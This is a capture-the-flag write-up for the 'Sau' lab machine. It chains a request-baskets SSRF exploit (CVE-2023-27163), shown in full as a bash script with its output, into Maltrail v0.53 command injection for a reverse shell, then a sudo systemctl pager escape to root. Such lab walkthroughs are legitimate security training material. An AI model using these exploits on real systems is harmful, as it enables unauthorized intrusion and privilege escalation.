# Sau

## Nmap Scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 08:53 +08
Nmap scan report for 10.10.11.224
Host is up (0.048s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 16 May 2024 00:49:15 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     400 Bad Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Thu, 16 May 2024 00:48:49 GMT
|     Content-Length: 27
|     <a href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Thu, 16 May 2024 00:48:49 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94SVN%I=7%D=5/16%Time=6645592C%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/htm
SF:l;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Thu,\x2016\x20May\
SF:x202024\x2000:48:49\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\
SF:"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x
SF:20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Thu,\x2016\x20May\
SF:x202024\x2000:48:49\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
SF:est,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla
SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque
SF:st")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\
SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nDate:\x20Thu,\x2016\x20May\x202024\x2000:49:15\x20GM
SF:T\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20
SF:name\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}
SF:\$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.01 seconds
```

## Gaining Access

### Port 55555

Port 55555 serves a web application. Its footer shows that it is powered by `request-baskets` version `1.2.1`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FXEDJ1YLd6XD3TLnSzUUZ%2Fimage.png?alt=media&#x26;token=cf0df0bb-d8d0-4a84-a512-5d2d0f4e0bd6" alt=""><figcaption></figcaption></figure>

Searching for that version of `request-baskets` turns up CVE-2023-27163, a server-side request forgery: the basket-creation API accepts an arbitrary `forward_url` without any authentication, so any caller can make the server issue requests to hosts that only the server itself can reach.

{% embed url="https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7" %}

```bash
#!/bin/bash
# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Request-Baskets v1.2.1
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163

# PoC: create a basket whose forward_url points at a host the server can reach
# but we cannot, then request the basket so the server fetches it on our behalf.

if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
    help="Usage: exploit.sh <URL> <TARGET>\n\n"
    help+="Arguments:\n"
    help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n"
    help+=" TARGET"
    echo -e "$help"
    exit 1
fi

URL=$1
ATTACKER_SERVER=$2

# the API path is appended to URL, so make sure it ends with a slash
if [ "${URL: -1}" != "/" ]; then
    URL="$URL/"
fi

# random six-letter basket name (must match ^[\w\d\-_\.]{1,250}$)
BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c 6)

API_URL="${URL}api/baskets/$BASKET_NAME"

# proxy_response hands the forwarded server's reply back to the caller;
# expand_path appends whatever follows the basket name to forward_url
PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}"

echo "> Creating the \"$BASKET_NAME\" proxy basket..."

# basket creation needs no authentication; -f makes an HTTP error (e.g. a name
# collision) count as a failure instead of silently printing the error page
if ! response=$(curl -s -f -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
    echo "> FATAL: Could not properly request $API_URL. Is the server online?"
    exit 1
fi

BASKET_URL="$URL$BASKET_NAME"

echo "> Basket created!"
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER."

# the response carries the per-basket token; pretty-print it if jq is available
if ! command -v jq >/dev/null 2>&1; then
    echo "> Response body (Authorization): $response"
else
    echo "> Authorization: $(echo "$response" | jq -r ".token")"
fi

exit 0
```

Running the exploit with `http://127.0.0.1` as the target creates a basket that forwards to the server's own loopback. Port 80 shows as `filtered` in the nmap scan, so it cannot be reached directly, but browsing to the basket URL now returns whatever the internal web server on port 80 serves.

```bash
$ bash request-baskets-exploit.sh http://10.10.11.224:55555 http://127.0.0.1   
> Creating the "fcjkly" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/fcjkly now makes the server request to http://127.0.0.1.
> Authorization: uhQpD9GZDMsUtNxOqrfszl1VYPWGGSUA4cFLqS-97OHO
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FoDysAlLR8VSQeVfe2p2O%2Fimage.png?alt=media&#x26;token=52f9f7b0-93ef-430c-bdf3-0bd3cc150f6c" alt=""><figcaption></figcaption></figure>

### Maltrail RCE Vulnerability

The site on port 80 identifies itself as `Maltrail (v0.53)`. That version has an unauthenticated OS command injection in the login handler: the `username` parameter of `POST /login` is interpolated into a shell command, so anyone who can reach the login endpoint, here through the basket, can execute commands as the user running Maltrail.

{% embed url="https://github.com/spookier/Maltrail-v0.53-Exploit" %}

The exploit takes the listener address and the URL at which Maltrail is reachable. Here that URL is the basket (`http://10.10.11.224:55555/fcjkly`): because the basket was created with `expand_path`, a request to `/fcjkly/login` is forwarded to `http://127.0.0.1/login`. Start a listener (for example `nc -lvnp [listening_PORT]`) before running it.

```bash
python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FP8hEloLVjHZApyli976L%2Fimage.png?alt=media&#x26;token=1ed6289f-c8f5-4956-8753-b01851595abd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F48BNRH4FEUnVKyKTODu4%2Fimage.png?alt=media&#x26;token=51cf6f87-e151-4970-aed7-835a3bbba5ba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F422SUdHMgQc66YL0IFz4%2Fimage.png?alt=media&#x26;token=2e942a6f-df66-45dc-b583-028b721158c2" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Sudo -l

The shell lands as `puma`. `sudo -l` shows that this user may run `/usr/bin/systemctl status trail.service` as root.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FSFjp2LC5mwmiEjSRJIjg%2Fimage.png?alt=media&#x26;token=3ec3fff4-ce33-429e-8529-cecf5e4700c5" alt=""><figcaption></figcaption></figure>

That rule is enough for a root shell. When its output does not fit the terminal, `systemctl status` hands it to a pager (`less` by default), and under sudo that pager runs as root; from the `less` prompt, `!sh` spawns a shell with those privileges. This only works from a real TTY, so upgrade the reverse shell first (for example `python3 -c 'import pty; pty.spawn("/bin/bash")'`).

{% embed url="https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/" %}

Following those steps gives a root shell, from which `root.txt` can be read. The lesson for the sudoers rule: any permitted command that can spawn a pager or editor is an escape, so the rule should pin `--no-pager` (or call a wrapper script with fixed arguments) rather than allow `systemctl status` as-is.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FJ2xwEk7ncDvwjqmTSR4K%2Fimage.png?alt=media&#x26;token=5abec86e-bae1-4019-a069-4c8d2b2f0382" alt=""><figcaption></figcaption></figure>
